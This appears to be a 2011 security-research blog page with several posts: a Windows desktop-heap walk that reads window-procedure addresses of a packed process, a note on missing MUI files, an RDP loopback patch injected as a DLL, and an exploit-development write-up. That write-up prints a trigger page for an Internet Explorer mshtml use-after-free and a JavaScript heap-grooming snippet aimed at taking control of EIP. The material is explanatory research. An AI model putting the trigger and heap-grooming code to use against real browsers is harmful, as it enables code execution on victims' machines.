Saturday, October 1, 2011

Unpack me if you can

Profiting from Desktop heap information


Having followed all the recent buzz about the kernel part of the Windows graphics and messaging subsystem, I decided to take a look at it to understand how it works and to see whether I could find anything interesting and useful. Inspired by Alex Ionescu's online presentation, I dove into the realm of the desktop heap and began to appreciate the richness of the information available there. This post is about a little game that shows some of the potential behind that data. The game is to run a packed application and, from user mode, try to get some critical information from that process without interfering with it: as passively and non-invasively as possible, without calling into the kernel and without touching the packed process in any way.

Note: As always, the full paper is available here

For the setup, I grabbed a notepad.exe executable from an XP machine and packed it with UPX.
If you want to know why I didn't use notepad.exe from Windows 7, read my last post: "MUI hell". I renamed notepad.exe to popo.exe to avoid any confusion with names, and ran it. Looking at it in ProcExp afterwards, one can see that the popo.exe process has high entropy, so it is flagged as a packed image (highlighted in purple).

Figure 1: Packed process

Next, as I needed another GUI process and didn't want to lock explorer.exe, I ran another notepad.exe. This time I used the one from Windows 7.

As a side note, I'm going to jump around between kernel and user debuggers. Please try to keep in mind that the kernel debugger is just used to validate some of the demonstration data.

Continuing, let's find a GUI process :)


!process 0 0 notepad.exe
PROCESS 85cb7d40  SessionId: 1  Cid: 0a14    Peb: 7ffd4000  ParentCid: 0804
    DirBase: 1be3b000  ObjectTable: 998c05d0  HandleCount:  58.
    Image: notepad.exe

From that process, get a GUI thread.

!process
PROCESS 85cb7d40  SessionId: 1  Cid: 0a14    Peb: 7ffd4000  ParentCid: 0804
    DirBase: 1be3b000  ObjectTable: 998c05d0  HandleCount:  58.
    Image: notepad.exe
    VadRoot 84444c88 Vads 70 Clone 0 Private 1454. Modified 1084. Locked 0.

        THREAD 8458d838  Cid 0a14.0a1c  Teb: 7ffdf000 Win32Thread: ff9ba008 WAIT: (WrUserRequest) UserMode Non-Alertable
            84caaec8  SynchronizationEvent

.thread 8458d838 
Implicit thread is now 8458d838

k
  *** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr 
96b4eb10 82c9ad75 nt!KiSwapContext+0x26
96b4eb48 82c99bd3 nt!KiSwapThread+0x266
96b4eb70 82c9388f nt!KiCommitThreadWait+0x1df
96b4ebe8 915296d6 nt!KeWaitForSingleObject+0x393
96b4ec44 915294e3 win32k!xxxRealSleepThread+0x1d7
96b4ec60 91526550 win32k!xxxSleepThread+0x2d
96b4ecb8 91529aa2 win32k!xxxRealInternalGetMessage+0x4b2
96b4ed1c 82c7487a win32k!NtUserGetMessage+0x3f
96b4ed1c 779c70c6 nt!KiFastCallEntry+0x12a
000ff998 76d7cde0 ntdll!KiIntSystemCall+0x6
000ff99c 76d7ce13 USER32!NtUserGetMessage+0xc
000ff9b8 0080148a USER32!GetMessageW+0x33
000ff9f8 008016ec notepad!WinMain+0xe6
000ffa88 77473c45 notepad!_initterm_e+0x1a1
000ffa94 779e37f5 kernel32!BaseThreadInitThunk+0xe
000ffad4 779e37c8 ntdll!__RtlUserThreadStart+0x70
000ffaec 00000000 ntdll!_RtlUserThreadStart+0x1b

OK, now we need to find out where the desktop heap is mapped.

!teb
TEB at 7ffdf000

dt nt!_TEB 7ffdf000 win*
   +0x040 Win32ThreadInfo : 0xff9ba008 Void
   +0x6cc Win32ClientInfo : [62] 0x20000188
   +0xf6c WinSockData : (null)

dt win32k!tagCLIENTINFO 0x7ffdf6cc
+0x000 CI_flags         : 0x20000188
   +0x018 pDeskInfo        : 0x01d00578 tagDESKTOPINFO
   +0x01c ulClientDelta    : 0xfcb00000
   +0x028 CallbackWnd      : _CALLBACKWND
   +0x03c pClientThreadInfo : 0x01d0fd68 tagCLIENTTHREADINFO
   +0x064 hKL              : 0x08160816 HKL__
   +0x068 CodePage         : 0x4e4
   +0x06a achDbcsCF        : [2]  ""
   +0x06c msgDbcsCB        : tagMSG
   +0x088 lpdwRegisteredClasses : 0x76dc90d4  -> 0x90


dt win32k!tagDESKTOPINFO 0x01d00578
   +0x000 pvDesktopBase    : 0xfe800000 Void
   +0x004 pvDesktopLimit   : 0xff400000 Void
   +0x008 spwnd            : 0xfe800618 tagWND
   +0x00c fsHooks          : 0x4000
   +0x010 aphkStart        : [16] (null)
   +0x050 spwndShell       : 0xfe8082c0 tagWND
   +0x054 ppiShellProcess  : 0xff9c9608 tagPROCESSINFO
   +0x058 spwndBkGnd       : 0xfe808508 tagWND
   +0x05c spwndTaskman     : 0xfe804428 tagWND
   +0x060 spwndProgman     : (null)
   +0x064 pvwplShellHook   : 0xff919638 VWPL
   +0x068 cntMBox          : 0n0
   +0x06c spwndGestureEngine : (null)
   +0x070 pvwplMessagePPHandler : (null)
   +0x074 fComposited      : 0y0
   +0x074 fIsDwmDesktop    : 0y1

!kvas 0xfe800000
kvas : Show region containing fe800000
### Start    End        Length (  MB)    Count Type   
000 fdc00000 ffbfffff  2400000 (  36)        8 SessionSpace

!ptelist 0xfe800000
ptelist : Using fe800000 as VA
VA       |PDE                                 |PTE                               
FE800000 |Hard Pfn=128E0 Attr=---DA--KWEV     |Hard Pfn=13FE1 Attr=---DA--KWEV

Here we have the kernel address (0xfe800000) of an executable heap on a 32-bit architecture.
According to the WinDbg help: "Executable page. For platforms that do not support a hardware execute/noexecute bit, including many x86 systems, the E is always displayed." In other words, this applies where NX is not present. Can anyone out there validate the executability of this heap on x64?
So we have a kernel address obtained from user mode, and a heap that we can iterate and validate, also from user mode.
A heap we can fill with GUI objects. Shellcode, anyone? Stack pivoting?
This heap is called the Desktop heap. It is mapped read-only into the user-mode address space of every process that shares the same desktop and session, regardless of integrity level.

!vad 84444c88
VAD     level      start      end    commit
85ccf578 ( 5)         10       1f         0 Mapped       READWRITE          Pagefile-backed section
...
8458f448 ( 1)        800      82f         4 Mapped  Exe  EXECUTE_WRITECOPY  \Windows\System32\notepad.exe
8518bb90 ( 5)        830     182f        41 Private      READWRITE        
85206270 ( 4)       1830     18f7         0 Mapped       READONLY           Pagefile-backed section
845ed280 ( 5)       1900     19de         0 Mapped       READONLY           Pagefile-backed section
84600e10 ( 3)       19e0     19ef         1 Private      READWRITE        
85935718 ( 5)       19f0     1aef       128 Private      NO_ACCESS        
85cb43e0 ( 4)       1af0     1bef       130 Private      NO_ACCESS        
845770c0 ( 2)       1bf0     1cf0         0 Mapped       READONLY           Pagefile-backed section
85220368 ( 4)       1d00     28ff         0 Mapped       READONLY           Pagefile-backed section
85e32560 ( 3)       2900     29ff         2 Private      NO_ACCESS        


Although this alone might get you interested in this portion of memory, in this post I'm not going to talk about the potential of using this heap in privilege escalation exploits.
I'm going to focus only on tagCLS objects and what we can do with the information they provide from a user mode perspective.

The tagCLS objects are created by the win32k module, specifically by the ClassAlloc function, which allocates them in the Desktop heap when called by InternalRegisterClassEx. This system call is invoked whenever its user32.dll counterpart, the RegisterClassEx function, is used to register a window class (tagWNDCLASSEX).

typedef struct tagWNDCLASSEX {
  UINT      cbSize;
  UINT      style;
  WNDPROC   lpfnWndProc;
  int       cbClsExtra;
  int       cbWndExtra;
  HINSTANCE hInstance;
  HICON     hIcon;
  HCURSOR   hCursor;
  HBRUSH    hbrBackground;
  LPCTSTR   lpszMenuName;
  LPCTSTR   lpszClassName;
  HICON     hIconSm;
} WNDCLASSEX, *PWNDCLASSEX;

Let's see what the Desktop heap has for us, from user mode. To calculate its user-mode base address we grab the pDeskInfo member from the TEB's Win32ClientInfo and subtract 0x578: the 0x570 bytes of heap metadata plus the 8-byte HEAP_ENTRY header that precedes the tagDESKTOPINFO. Having the heap's base address, we can dump it now:

dt nt!_heap 0x01d00000
   +0x000 Entry            : _HEAP_ENTRY
   +0x008 SegmentSignature : 0xffeeffee
   +0x00c SegmentFlags     : 1
   +0x010 SegmentListEntry : _LIST_ENTRY [ 0xfe8000a8 - 0xfe8000a8 ]
   +0x018 Heap             : 0xfe800000 _HEAP
   +0x01c BaseAddress      : 0xfe800000 Void
   +0x020 NumberOfPages    : 0xc00
   +0x024 FirstEntry       : 0xfe800570 _HEAP_ENTRY
   +0x028 LastValidEntry   : 0xff400000 _HEAP_ENTRY
   +0x02c NumberOfUnCommittedPages : 0xbaa
   +0x030 NumberOfUnCommittedRanges : 1
   +0x034 SegmentAllocatorBackTraceIndex : 0
   +0x036 Reserved         : 0
   +0x038 UCRSegmentList   : _LIST_ENTRY [ 0xfe855ff0 - 0xfe855ff0 ]
   +0x064 Signature        : 0xeeffeeff
   +0x0a0 VirtualAllocdBlocks : _LIST_ENTRY [ 0xfe8000a0 - 0xfe8000a0 ]
   +0x0a8 SegmentList      : _LIST_ENTRY [ 0xfe800010 - 0xfe800010 ]
   +0x0b8 BlocksIndex      : 0xfe800138 Void
   +0x0c4 FreeLists        : _LIST_ENTRY [ 0xfe81ef70 - 0xfe8489b8 ]
   +0x0d0 CommitRoutine    : 0x91497343     long  win32k!UserCommitDesktopMemory+0
   +0x0d4 FrontEndHeap     : (null)
   +0x0d8 FrontHeapLockCount : 0
   +0x0da FrontEndHeapType : 0 ''
   +0x0dc Counters         : _HEAP_COUNTERS
   +0x130 TuningParameters : _HEAP_TUNING_PARAMETERS

All the pointers in this dump are kernel-mode addresses, but we can easily determine the offset between the kernel-mode and user-mode mappings (it matches the ulClientDelta value seen in tagCLIENTINFO above):

?0xfe800000-0x01d00000
Evaluate expression: -55574528 = fcb00000

Since every heap allocation starts with a HEAP_ENTRY header, we can see that the tagDESKTOPINFO is the first allocation in the heap:

?0xfe800570+@@(sizeof(nt!_heap_entry))
Evaluate expression: -25164424 = fe800578

?(fe800578&0000ffff)+01d00000
Evaluate expression: 30410104 = 01d00578

Knowing the offset between kernel mode and user mode mappings of the Desktop heap, we can adjust the kernel addresses found and rebase them to user mode addresses. Doing so allows us to iterate through the whole heap, chunk by chunk.
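The rebasing and the chunk-by-chunk stepping can be sketched outside the debugger as follows. This is only an illustration, not a tool from the post: the function names are hypothetical, the constants are the values from the dumps in this post, and it assumes the 32-bit layout in which `_HEAP_ENTRY.Size` counts 8-byte units.

```python
# Values taken from the debugger output in this post (32-bit Windows 7).
KERNEL_HEAP_BASE = 0xFE800000   # tagDESKTOPINFO.pvDesktopBase
USER_HEAP_BASE = 0x01D00000     # user-mode mapping of the same heap
HEAP_GRANULARITY = 8            # _HEAP_ENTRY.Size is counted in 8-byte units


def client_delta(kernel_base, user_base):
    """Offset between the kernel and user mappings, as a 32-bit value."""
    return (kernel_base - user_base) & 0xFFFFFFFF


def kernel_to_user(kernel_addr, delta):
    """Rebase a kernel-mode desktop heap pointer to its user-mode address."""
    return (kernel_addr - delta) & 0xFFFFFFFF


def next_entry(entry_addr, size_units):
    """Address of the heap entry that follows one of `size_units` units."""
    return entry_addr + size_units * HEAP_GRANULARITY


delta = client_delta(KERNEL_HEAP_BASE, USER_HEAP_BASE)
print(hex(delta))
print(hex(kernel_to_user(0xFE800578, delta)))
print(hex(next_entry(0x01D00570, 0x10)))
```

The three printed values can be compared against the `?` expressions evaluated in the debugger.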

dt nt!_HEAP_ENTRY 01d00570
   +0x000 Size             : 0x10

?01d00570+0x10*8
Evaluate expression: 30410224 = 01d005f0

dt nt!_HEAP_ENTRY 01d005f0
   +0x000 Size             : 4

?01d005f0+0x4*8
Evaluate expression: 30410256 = 01d00610

dt nt!_HEAP_ENTRY 01d00610
   +0x000 Size             : 0x17

Etc. But I said we're going to hunt for tagCLS objects. Let's have a look at them. The size of a tagCLS structure is:

?@@(sizeof(win32k!tagCLS)+sizeof(nt!_heap_entry))
Evaluate expression: 100 = 00000064

But as 0x64 isn't a multiple of eight, we need to round it up to 0x68, giving:

?68/8
Evaluate expression: 13 = 0000000d

So we need to look for heap entries of size 0xd.
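The rounding above generalizes to any structure size. A minimal sketch, assuming an 8-byte `_HEAP_ENTRY` header and 8-byte granularity as in the dumps of this post; `heap_units` is a hypothetical helper name, and 0x5C is the tagCLS size implied by the 0x64 total:

```python
HEAP_ENTRY_SIZE = 8   # sizeof(nt!_HEAP_ENTRY) on this 32-bit system
TAGCLS_SIZE = 0x5C    # sizeof(win32k!tagCLS), implied by the 0x64 total


def heap_units(payload_size, header_size=HEAP_ENTRY_SIZE, granularity=8):
    """Value expected in _HEAP_ENTRY.Size for a payload of this many bytes."""
    total = payload_size + header_size
    # Round up to the next multiple of the heap granularity.
    rounded = (total + granularity - 1) // granularity * granularity
    return rounded // granularity


print(hex(heap_units(TAGCLS_SIZE)))
print(hex(heap_units(0x78)))   # tagDESKTOPINFO, the first heap entry
```

The second call gives the Size of the first entry seen during the manual heap walk.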

To recap, the first heap chunk is a tagDESKTOPINFO.

?@@(sizeof(win32k!tagDESKTOPINFO))
Evaluate expression: 120 = 00000078

?01d00578+0x78
Evaluate expression: 30410224 = 01d005f0

So, our first seekable element is at 01d005f0, which is validated by our previous manual heap walking.
Although I could loop through all the heap entries, as before, I just need to find a first valid tagCLS to validate the data. Let's search for candidate entries of size 0xd:

s -w 01d005f0 l1000 d
01d006c8  000d 0001 0017 0c00 06d0 ff68 8001 8001  ..........h.....
01d00734  000d 0900 3323 3732 3936 fe00 0018 0001  ....#32769......
01d00800  000d 0001 0018 0c00 0808 ff68 c039 c039  ..........h.9.9.

dt nt!_HEAP_ENTRY 01d006c8 
   +0x000 Size             : 0xd
   +0x002 Flags            : 0x1 ''
   +0x003 SmallTagIndex    : 0 ''
   +0x000 SubSegmentCode   : 0x0001000d Void
   +0x004 PreviousSize     : 0x17

This seems a valid entry. Let's dump it as tagCLS:

dt win32k!tagCLS 01d006c8+8 
   +0x000 pclsNext         : 0xff6806d0 tagCLS
   +0x004 atomClassName    : 0x8001
   +0x006 atomNVClassName  : 0x8001
   +0x008 fnid             : 0x29d
   +0x00c rpdeskParent     : 0x8585d678 tagDESKTOP
   +0x010 pdce             : (null)
   +0x014 hTaskWow         : 0
   +0x016 CSF_flags        : 0x41
   +0x018 lpszClientAnsiMenuName : (null)
   +0x01c lpszClientUnicodeMenuName : (null)
   +0x020 spcpdFirst       : (null)
   +0x024 pclsBase         : 0xffb22758 tagCLS
   +0x028 pclsClone        : (null)
   +0x02c cWndReferenceCount : 0n1
   +0x030 style            : 8
   +0x034 lpfnWndProc      : 0x914fcd91     long  win32k!xxxDesktopWndProc+0
   +0x038 cbclsExtra       : 0n0
   +0x03c cbwndExtra       : 0n0
   +0x040 hModule          : 0x91460000 Void
   +0x044 spicn            : (null)
   +0x048 spcur            : 0xffb75608 tagCURSOR
   +0x04c hbrBackground    : 0x00000002 HBRUSH__
   +0x050 lpszMenuName     : (null)
   +0x054 lpszAnsiClassName : 0xfe800738  "#32769"
   +0x058 spicnSm          : (null)

This is what we need. Let's get the tagDESKTOP address and validate it. This time we'll use the kernel debugger to verify the address, by following the Win32ThreadInfo member from the TEB.

dt win32k!tagTHREADINFO 0xff9ba008 rpdesk
   +0x0c8 rpdesk : 0x8585d678 tagDESKTOP

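Yes, it is the same. Now, if we search for all occurrences of this tagDESKTOP address in the Desktop heap and subtract 0xc (the offset of rpdeskParent) from each hit, we get a list of the tagCLS objects in the heap. Other objects that reference the desktop at the same offset, such as tagWND, show up as well.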

Note that if I were to write a program or script to do this, I'd register a tagWNDCLASSEX with a known lpfnWndProc such as 0xbadecafe, search for this value to locate my tagCLS object and get the corresponding tagDESKTOP; then I'd iterate over all the heap items, grabbing those with the same desktop. But, as I'm using the debugger for the demo, it's easier and simpler to do it this way.
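As an aside, such a scan could look like the sketch below. It is a hypothetical illustration, not the author's tool: it works on a byte buffer that is assumed to be a copy of the user-mode mapping, the offsets come from the tagCLS dump above, the size test is only a heuristic, and the demo buffer is synthetic.

```python
import struct

# Offsets taken from the tagCLS dump above (32-bit Windows 7).
RPDESKPARENT_OFFSET = 0x0C
LPFNWNDPROC_OFFSET = 0x34
HMODULE_OFFSET = 0x40
HEAP_ENTRY_SIZE = 8
MIN_TAGCLS_UNITS = 0x0D


def find_classes(heap_bytes, user_base, desktop_ptr):
    """Return (user address, hModule, lpfnWndProc) for each candidate tagCLS."""
    needle = struct.pack("<I", desktop_ptr)
    results = []
    pos = heap_bytes.find(needle)
    while pos != -1:
        cls_off = pos - RPDESKPARENT_OFFSET
        entry_off = cls_off - HEAP_ENTRY_SIZE
        in_bounds = entry_off >= 0 and cls_off + HMODULE_OFFSET + 4 <= len(heap_bytes)
        if pos % 4 == 0 and in_bounds:
            # Heuristic: the chunk must be at least as large as a tagCLS.
            (size_units,) = struct.unpack_from("<H", heap_bytes, entry_off)
            if size_units >= MIN_TAGCLS_UNITS:
                (wndproc,) = struct.unpack_from("<I", heap_bytes, cls_off + LPFNWNDPROC_OFFSET)
                (hmodule,) = struct.unpack_from("<I", heap_bytes, cls_off + HMODULE_OFFSET)
                results.append((user_base + cls_off, hmodule, wndproc))
        pos = heap_bytes.find(needle, pos + 1)
    return results


# Synthetic demo buffer: one heap entry of size 0xd holding a fake tagCLS.
demo = bytearray(0x100)
struct.pack_into("<H", demo, 0x10, 0x0D)                             # _HEAP_ENTRY.Size
struct.pack_into("<I", demo, 0x18 + RPDESKPARENT_OFFSET, 0x8585D678)
struct.pack_into("<I", demo, 0x18 + LPFNWNDPROC_OFFSET, 0x01003429)
struct.pack_into("<I", demo, 0x18 + HMODULE_OFFSET, 0x01000000)
hits = find_classes(bytes(demo), 0x01D00000, 0x8585D678)
for addr, hmodule, wndproc in hits:
    print(hex(addr), hex(hmodule), hex(wndproc))
```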

s -d 01d005f0 l1000000 0x8585d678
01d00624  8585d678 fe800618 00040000 82000100  x...............
01d006dc  8585d678 00000000 00410000 00000000  x.........A.....
01d00754  8585d678 fe800748 00040000 80000100  x...H...........
01d00814  8585d678 00000000 00410000 00000000  x.........A.....
01d0088c  8585d678 fe800880 00040000 80000100  x...............
01d0096c  8585d678 00000000 03410000 00000000  x.........A.....
01d009e4  8585d678 fe8009d8 00000000 00000000  x...............
01d00a2c  8585d678 fe800a20 00000000 00000000  x... ...........
01d00a54  8585d678 00000000 00410000 00000000  x.........A.....

The most interesting parts of a tagCLS are lpfnWndProc and hModule because these are user mode addresses that we can use and validate from user mode.

.foreach (meuval {s -[1]d 01d005f0 l1000000 0x8585d678 } )  {
   .if ((poi(${meuval}-0x14)&0x0000ffff) >= 0000000d) {
      .printf "ObjAddr=[%08x], hInstance[%08x], WndProc=",
               poi(${meuval}+18),
               poi(${meuval}+34);
       dds (${meuval}+28) l1;
    }
 }

Note: The size check in the command above accepts entries greater than or equal to the size of a tagCLS, because the kernel can reserve some extra space if requested by the user, as indicated by the cbclsExtra class member.

...
ObjAddr=[fe800ac0], hInstance[00800000], WndProc=01d00af4  008072c5 notepad!NpSaveDialogHookProc+0x97
ObjAddr=[fe800b58], hInstance[76d60000], WndProc=01d00b8c  76d70666 USER32!ImeWndProcW
ObjAddr=[fe800dd0], hInstance[77090000], WndProc=01d00e04  770941b5 MSCTF!UIWndProc
ObjAddr=[fe800e38], hInstance[77090000], WndProc=01d00e6c  770fdd77 MSCTF!UIComposition::CompWndProc
...
...
ObjAddr=[fe805228], hInstance[749f0000], WndProc=01d0525c  74a1fe38 COMCTL32!CListView::s_WndProc
ObjAddr=[fe805490], hInstance[749f0000], WndProc=01d054c4  74a16022 COMCTL32!Header_WndProc
...
ObjAddr=[fe807320], hInstance[01000000], WndProc=01d07354  01003429
...
ObjAddr=[fe814950], hInstance[70830000], WndProc=01d14984  708432bc
ObjAddr=[fe814ba8], hInstance[70830000], WndProc=01d14bdc  708431dc
ObjAddr=[fe814c40], hInstance[70830000], WndProc=01d14c74  70842954
...
ObjAddr=[fe82b580], hInstance[77820000], WndProc=01d2b5b4  778663e5 ole32!OleMainThreadWndProc
ObjAddr=[fe82cb70], hInstance[00800000], WndProc=01d2cba4  008014de notepad!NPWndProc
...
ObjAddr=[fe842790], hInstance[77090000], WndProc=01d427c4  770fdd77 MSCTF!UIComposition::CompWndProc
ObjAddr=[fe8428a8], hInstance[76d60000], WndProc=01d428dc  76db3f06 USER32!EditWndProcW
ObjAddr=[fe842910], hInstance[749f0000], WndProc=01d42944  749f99d0 COMCTL32!Edit_WndProc
ObjAddr=[fe842ac8], hInstance[749f0000], WndProc=01d42afc  74a90d49 COMCTL32!StatusWndProc
ObjAddr=[fe843c78], hInstance[01010000], WndProc=01d43cac  01044270

Dumping lpfnWndProc and hModule from all the tagCLS objects found in the desktop heap, we can observe that all the user window message handlers registered in the system for the current desktop are available for analysis from user mode. From the dump above I've identified two from notepad, NpSaveDialogHookProc and NPWndProc (the main window procedure), and a module at 0x01000000. This entire post is about module 0x01000000.

Module 0x01000000 is popo.exe, as can be seen in ProcExp.

Figure 2: Packed popo.exe module address.


The WndProc value stored at memory position 0x1d07354, 0x01003429, is the NPWndProc window message handler of popo.exe, as seen in the figure. The figure shows the unpacked version of popo.exe so that symbol resolution is available.
 
 Figure 3: Window dispatcher registration.

Figure 4: Window dispatcher registration arguments.

So there you have it: a simple, non-invasive way of getting some information from packed or protected applications.

Other thoughts: Do you think the same info is available for Protected (Media Path) processes, those we are not supposed to get any info about?
Is there any information available for windows on other desktops in the same session? Can we link this data in any way with the aheList?


Hope you enjoyed it.

Thursday, September 22, 2011

MUI hell

How hateful can Microsoft Windows (sometimes) be? Let me count the times... Well, this one happened while I was doing some experiments with Notepad.exe. As I needed to modify the Notepad.exe binary and didn't want to mess with the installation, I copied it to a temporary folder. I changed the binary afterwards and tried to run it.
Hmmm... Nothing happened. I ran it again, and again, and again... Nothing was happening. So I copied it again and tried to run it, to see whether the failure was caused by the patching. Nope. Again, nothing was happening. I ran it again, and again, and again... Nothing.

I decided to run Procmon on it, and surprise, surprise, a couple of things failed to be found, namely: the MUI files.


After I copied the missing files from the Windows "en" and "en-US" subdirectories to the temp dir, maintaining the directory structure, notepad finally executed.
Doing the same with Calc.exe, guess what?
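The layout that made the copy work can be sketched as a small path helper. This is an illustration only: `mui_candidates` is a hypothetical name, and the language list simply mirrors the two subdirectories mentioned above rather than the loader's real fallback order.

```python
from pathlib import PureWindowsPath


def mui_candidates(exe_path, languages=("en-US", "en")):
    """Paths where a .mui resource file is expected next to a copied binary."""
    exe = PureWindowsPath(exe_path)
    # Each language gets its own subdirectory beside the executable.
    return [exe.parent / lang / (exe.name + ".mui") for lang in languages]


for candidate in mui_candidates(r"C:\temp\notepad.exe"):
    print(candidate)
```

Copying the matching files from the original installation into those locations reproduces the directory structure described above.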


Who's responsible for this? A stupid function exported from ntdll called LdrpLoadResourceFromAlternativeModule.
This function gets called when Notepad.exe and Calc.exe try to load resource strings from the binary.

Oh, and this seems to break UPX....

What the hell?

Tuesday, September 20, 2011

Inside Job (or give me a loop)

Let's pretend I'm a System Administrator (:)), and I've got to tweak some features and install some software on my client PCs and servers for end users and programmers.
I'm logged in as Administrator, so, some of the policies and configurations I'm pushing don't apply to my account.
I need to login as a test user with membership similar to my clients to verify if everything is working and in place. At the same time I'd like to keep my admin session open, so I can make some adjustments to the configuration.
If I'm logged into a workstation console and I try to open a different session as another user, I'm obliged to use the 'Fast user switching' service. But this locks my previous admin session. If I try to open an RDP connection to the machine while still logged into the computer's console, I get an error reporting that I'm already connected to the console of the local computer.

But all this is possible as long as I use remote sessions from a Windows Server product. That is to say, you can loop back through RDP in Windows Server, meaning that something is different in its RDP implementation. Could it be that the client is different from the one in the Workstation product? I can't even see the remote console connection.

What is the logic of this? In Windows Professional Edition, this happens because of a Microsoft policy that allows only one console session at a time. But, as the server edition has an admin remote console mode, shouldn't the same concept be applied to the workstation edition? Why can't I open a new RDP session through localhost, or the loopback interface, while logged into the console?

I don't know.

Trying to understand the reasoning behind this limitation, I determined that the loopback block resides in the client and not in the server.
The key lies in a COM object provided by mstscax.dll.
I developed a PoC tool that demonstrates just this. The tool is a DLL called gimmelooprdp.dll, available here, that you can inject into an mstsc.exe RDP client. Run mstsc.exe, get its PID, and use a DLL injection tool to inject the DLL into the mstsc.exe process.



Afterwards you can proceed as usual. Set the machine's local address in the Computer field and press Connect. The tool only works on Windows XP SP2 (as Microsoft no longer offers support for it, I hope they don't get annoyed by this hack). So, you'll be able to establish the connection but, as Windows XP Pro only allows one session at a time, your primary console session will be logged off. If you wish to proceed with two open sessions in the Professional edition, it is indeed possible, but you'll have to 'explode' the sessions (see my previous post 'Exploding sessions').



The dll can be downloaded here.

Thursday, September 1, 2011

Diaries of vulnerability - take 2

Stage 1 exploit - Controlling EIP


A friend of mine mentioned that he wasn't able to run the original exploit published by d0c_s4vage on his machine. Another one pointed out that he didn't understand why the original exploit used a block size of 0xE0 for heap spraying, even though the object used after free was a CTreeNode of size 0x4C. I thought this was good motivation for a post, so here it is.

Note: I'll make this post simpler than the first part, so I'll skip some explanations along the way, and I'll leave the first point for another post, as its analysis requires some background that will be covered in the explanation of the second point and in this post.
Note 2: Again the pretty formatted paper is available here for download.

Let's begin with a slight variation of the exploit, so that we can test it more conveniently:

<html>
   <body>
     <script language='javascript'>
       document.body.innerHTML += "<object align='right' width='1000'>TAG_1</object>";
       document.body.innerHTML += "<a style='float:left;'>TAG_3</a>A";
       document.body.innerHTML += "A";
       document.body.innerHTML += "<strong id='popo' style='font-size:1000pc; margin:auto -1000cm auto auto;' dir='ltr'></strong>";

       document.getElementById('popo').innerHTML = "Z";
    </script>
  </body>
</html>


And these breakpoints:

bp mshtml!CTreeNode::CTreeNode ".printf \" CTreeNode:node[%08x] Type:\",ecx;dds edi l1; gc;"
bp mshtml!CObjectElement::CObjectElement ".printf \" CObjectElement:addr[%08x] \\n\",esi;gc"


Let's review some history:

CObjectElement:addr[004150e8]
CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'
CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable'
CTreeNode:node[0042b280] Type:mshtml!CPhraseElement::`vftable'
CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'
CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable' 
... 
CTreeNode:node[0042ae60] Type:mshtml!CBodyElement::`vftable'
(b60.2e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0042adb0 ecx=0041010a edx=00000000 esi=01ffbc20 edi=00000000

eip=6987b68f esp=01ffbbf4 ebp=01ffbc0c iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:00000070=????????
 

ub mshtml!CElement::Doc:
6987b68d 8b01 mov eax,dword ptr [ecx]


dc ebx

0042adb0 0041010a 00000000 ffff404a ffffffff ..A.....J@......


What we have here is, as we saw in the previous post, that EBX is a pointer to the freed CTreeNode object, which is being wrongly reused. So, why don't we reclaim the freed CTreeNode and fill it with content we control? If ECX is the first value of the CTreeNode, we could adjust its value so that we jump directly to our NOP sled address. The problem is that between the free of the CTreeNode and its use we have no chance of intervening in the execution path (through JavaScript). So we need to deal with the value left by the heap allocator. If ECX is the first value of the CTreeNode, according to the reversed code it should be pointing to a CObjectElement, but the value in ECX is apparently not a valid or known object address:

!heap -x 0041010a
Entry User Heap Segment Size PrevSize Unused Flags

-----------------------------------------------------

00410050 00410058 00370000 00410450 100 - 0 LFH;free

The reason for this is that the object EBX points to was freed. When a user memory chunk is returned to the heap allocator (the LFH in this case), besides all the heap-related metadata being updated, the first WORD in the user portion of the allocation gets a new purpose: it becomes the FreeEntryOffset:

*(WORD *)(ChunkHeader + 8) = AggrExchg.FreeEntryOffset;

This explains the 0x010a, but what is the 0x0041? This value is the two most significant bytes of the original value; the free process doesn't update this WORD, so we know that the CObjectElement pointer had a value of 0x0041xxxx, which corresponds to our freed CObjectElement in the trace: 0x004150e8.
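The effect of the free on the first DWORD can be reproduced with plain bit arithmetic. A minimal sketch with a hypothetical helper name, using the values from the trace above:

```python
def first_dword_after_free(original_dword, free_entry_offset):
    """Low WORD is replaced by FreeEntryOffset; the high WORD is left as is."""
    return (original_dword & 0xFFFF0000) | (free_entry_offset & 0xFFFF)


# CObjectElement pointer 0x004150e8 with FreeEntryOffset 0x010a.
print(hex(first_dword_after_free(0x004150E8, 0x010A)))
```

The result is the stale value that ends up in ECX at the crash.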

LFH, as it tries to keep fragmentation to a minimum, uses a metadata structure called a heap sub-segment, which organizes memory in contiguous chunks and keeps track of allocated and freed memory blocks of the same size.
So one sub-segment is used to manage blocks of size 0x4C and another sub-segment manages the allocation and de-allocation of blocks of size 0xE0, which explains why two allocations made at nearly the same time, CObjectElement:addr[004150e8] and CTreeNode:node[0042adb0], have such different addresses.

This simplified view of the process is important, because it will allow us to influence the process and, more importantly, the values that we want stored in this first DWORD of the user buffer. I say first DWORD because we want to predictably set this to a usable or controllable pointer address.
How can we influence this, then?
As the first WORD is a FreeEntryOffset, and it's updated when a CTreeNode is freed, we'll need to impose some determinism on CTreeNode allocations. How do we do this? We allocate enough objects of this size to fill potential holes in the sub-segment that manages 0x4C-sized objects, and at some point we'll start getting contiguous allocations. The following code will do the trick:
... 
document.body.innerHTML += "<strong id='popo' style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'></strong>";
  var size = 0x4c; 
  var arrSize = 200;
  var obj_overwrite = unescape("%u0c0c%u0c0c"); 
  while(obj_overwrite.length < size) 
  { obj_overwrite += obj_overwrite; } 
  obj_overwrite = obj_overwrite.substr(0, (size-6)/2); 
  CollectGarbage(); 
  var arr = new Array(); 
  for(var counter = 0; counter < arrSize; counter++) 
  { arr.push(obj_overwrite.substr(0, obj_overwrite.length)); } 
  for(var counter = arrSize-50; counter < arrSize; counter+=3) 
  { delete arr[counter]; } 
  CollectGarbage(); 
  document.getElementById('popo').innerHTML = "Z"; 
...

 
After crashing we get this:

dc ebx ebx+0x4C
002d6318 002e00a7 00000000 ffff404a ffffffff ........J@......

002d6328 00000051 00000000 00000000 00000000 Q...............

